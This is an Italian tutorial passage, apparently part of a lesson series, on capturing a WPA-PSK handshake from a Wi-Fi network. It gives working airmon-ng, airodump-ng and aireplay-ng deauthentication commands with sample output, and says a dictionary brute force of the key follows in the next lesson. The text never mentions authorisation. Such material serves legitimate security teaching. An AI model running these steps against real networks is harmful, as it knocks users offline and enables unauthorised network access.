Al fine di identificare la pre-shared key della rete PippoNET abbiamo bisogno, come detto, di catturare l'authentication handshake tra client ed access point; anche in questo caso, quindi, dev'esser presente almeno un host connesso.
Come sempre, è possibile attendere fino a quando un client si connetta alla rete oppure forzare la sua disconnessione e sniffare il traffico scambiato tra gli end point alla sua successiva riconnessione.
Naturalmente noi non abbiamo pazienza ed opteremo per questa seconda via, anche se non sempre dà i risultati sperati.
Poniamo la nostra scheda di rete in monitor mode, cosicché ascolti ogni pacchetto Wi-Fi che venga irradiato in aria (e possa iniettare essa stessa pacchetti), direttamente sul canale 11:
airmon-ng start rausb0 11
ed istruiamo airodump-ng di (iniziare a) collezionare gli handshake di autenticazione che capta sul canale 11 per quel dato access point:
airodump-ng -c 11 --bssid 00:49:13:A3:CE:09 -w psk rausb0
CH 11 ][ Elapsed: 1 min ][
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:49:13:A3:CE:09 114 100 1141 911 0 11 54 WPA TKIP PSK PippoNET
BSSID STATION PWR Rate Lost Packets Probes
00:49:13:A3:CE:09 00:13:02:B2:FA:28 110 54-54 0 916
00:49:13:A3:CE:09 00:1C:F0:A3:E7:80 -1 54- 0 0 8
Cerchiamo a questo punto di de-autenticare un client (00:13:02:B2:FA:28); apriamo un'altra shell di root e digitiamo:
aireplay-ng --deauth 5 -a 00:49:13:A3:CE:09 -c 00:13:02:B2:FA:28 rausb0
Waiting for beacon frame (BSSID: 00:49:13:A3:CE:09) on channel 11
[...]
In questo modo invieremo messaggi di de-autenticazione all'adattatore di rete dell'host target, il quale non ne controllerà la provenienza e, con fortuna, si sconnetterà.
In caso di successo sulla collezione dell'handshake:
WPA handshake: 00:49:13:A3:CE:09 !! WPA handshake: 00:49:13:A3:CE:09 !!
Bene. Siamo riusciti nell'intento di catturare un 4-way handshake e tentiamo ora un brute force basato su dizionario. Seguite la prossima lezione.
